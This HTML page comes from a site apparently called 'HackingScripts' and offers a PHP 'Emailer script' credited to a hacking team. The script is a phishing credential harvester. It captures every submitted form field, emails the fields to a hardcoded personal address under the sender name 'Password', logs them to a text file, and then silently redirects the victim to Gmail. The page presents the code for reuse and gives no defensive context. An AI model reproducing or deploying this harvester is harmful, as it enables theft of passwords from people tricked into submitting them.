<!DOCTYPE html>
<html>
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" type="text/css" href="/HackingScripts/stylesheets/stylesheet.css" media="screen" />
    <link rel="stylesheet" type="text/css" href="/HackingScripts/stylesheets/pygment_trac.css" media="screen" />
    <link rel="stylesheet" type="text/css" href="/HackingScripts/stylesheets/print.css" media="print" />
    <link rel="stylesheet" type="text/css" href="/HackingScripts/stylesheets/styles.css" media="print" />
    <link rel="icon" type="image/x-icon" href="/HackingScripts/favicon.ico">


    <!--[if lt IE 9]>
    <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->

    <title> Emailer script </title>
  </head>

  <body>
    <header>
      <div class="inner">
        <h1> <a href="/HackingScripts/">HackingScripts</a> </h1>
        <h2>Hack Scripts for everybody</h2>
      </div>
    </header>

    <div id="content-wrapper">
      <div class="inner clearfix">
        <section id="main-content">

          <h2>Emailer script</h2>
<p class="meta">13 Feb 2014</p>

<p>Emailer script &#8211; Coded by Hangaw_HawlerY of H4KurD-TeaM</p>

<h3>Emailer Script Source Code</h3>

<div class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span>

<span class="cm">/* </span>
<span class="cm">H4KurD-TeaM</span>
<span class="cm">www.h4kurd.com</span>
<span class="cm">Coded By : Hangaw_HawlerY</span>
<span class="cm">Email: Hangaw_HawlerY@Yahoo.com , Hangaw_HawlerY@Hotmail.com </span>
<span class="cm">All Right Reserved</span>
<span class="cm">*/</span>

<span class="nb">header</span> <span class="p">(</span><span class="s1">&#39;Location: https://www.gmail.com&#39;</span><span class="p">);</span>

<span class="nv">$posts</span>        <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">;</span>
<span class="k">foreach</span><span class="p">(</span><span class="nv">$_POST</span> <span class="k">as</span> <span class="nv">$k</span> <span class="o">=&amp;</span><span class="nx">gt</span><span class="p">;</span> <span class="nv">$v</span><span class="p">){</span>
    <span class="nv">$posts</span> <span class="o">.=</span> <span class="s1">&#39;$_POST[&#39;</span><span class="o">.</span><span class="nv">$k</span><span class="o">.</span><span class="s1">&#39;] = &#39;</span><span class="o">.</span><span class="nv">$v</span><span class="o">.</span><span class="s2">&quot;</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">;</span>
<span class="p">}</span>

<span class="nv">$posts</span>       <span class="o">.=</span> <span class="s2">&quot;---------------------------------------------------</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">;</span>
<span class="nv">$emailto</span>    <span class="o">=</span> <span class="s1">&#39;pramod.sin321@gmail.com&#39;</span><span class="p">;</span>
<span class="nv">$subject</span>    <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">&#39;HTTP_HOST&#39;</span><span class="p">]</span><span class="o">.</span><span class="s2">&quot;-&quot;</span><span class="o">.</span><span class="nv">$_SEREVER</span><span class="p">[</span><span class="s1">&#39;SERVER_NAME&#39;</span><span class="p">];</span>
<span class="nv">$from</span>        <span class="o">=</span> <span class="s2">&quot;From: Password &amp;lt;h4kurd.team@gmail.com&amp;gt;&quot;</span><span class="p">;</span>
<span class="nv">$body</span>        <span class="o">=</span> <span class="s1">&#39;</span>
<span class="s1">&#39;</span><span class="o">.</span><span class="nv">$posts</span><span class="o">.</span><span class="s1">&#39;</span>
<span class="s1">&#39;</span><span class="p">;</span>

<span class="o">@</span><span class="nb">mail</span><span class="p">(</span><span class="nv">$emailto</span><span class="p">,</span> <span class="nv">$subject</span><span class="p">,</span> <span class="nv">$body</span><span class="p">,</span> <span class="nv">$from</span><span class="p">);</span>
<span class="nv">$handle</span> <span class="o">=</span> <span class="o">@</span><span class="nb">fopen</span><span class="p">(</span><span class="s2">&quot;h4kurd.txt&quot;</span><span class="p">,</span> <span class="s2">&quot;a+&quot;</span><span class="p">);</span>
<span class="o">@</span><span class="nb">fwrite</span><span class="p">(</span><span class="nv">$handle</span><span class="p">,</span> <span class="nv">$posts</span><span class="p">);</span>
<span class="nb">fclose</span><span class="p">(</span><span class="nv">$handle</span><span class="p">);</span>
<span class="cp">?&gt;</span><span class="x"></span></code></pre></div>



        </section>

        <aside id="sidebar">
          <a href="/HackingScripts/upload/" class="button">
            <small>Upload</small>
            a file
          </a>


          <a href="/HackingScripts/scripts/" class="button">
            <small>The entire list of</small>
            hack scripts
          </a>
          <!--
          <p class="repo-owner"><a href="https://github.com/jasonlong/architect-theme">architect-theme</a> is maintained by <a href="https://github.com/jasonlong">jasonlong</a>.</p>

          <p class="repo-owner"><a href="https://github.com/pietromenna/jekyll-architect-theme">jekyll-architect-theme</a> is maintained by <a href="https://github.com/pietromenna">pietromenna</a>.</p>

          <p>This page was generated by <a href="https://pages.github.com">GitHub Pages</a> using the Architect theme by <a href="https://twitter.com/jasonlong">Jason Long</a>.</p>
      -->
        </aside>

      </div>
    </div>

  </body>
</html>
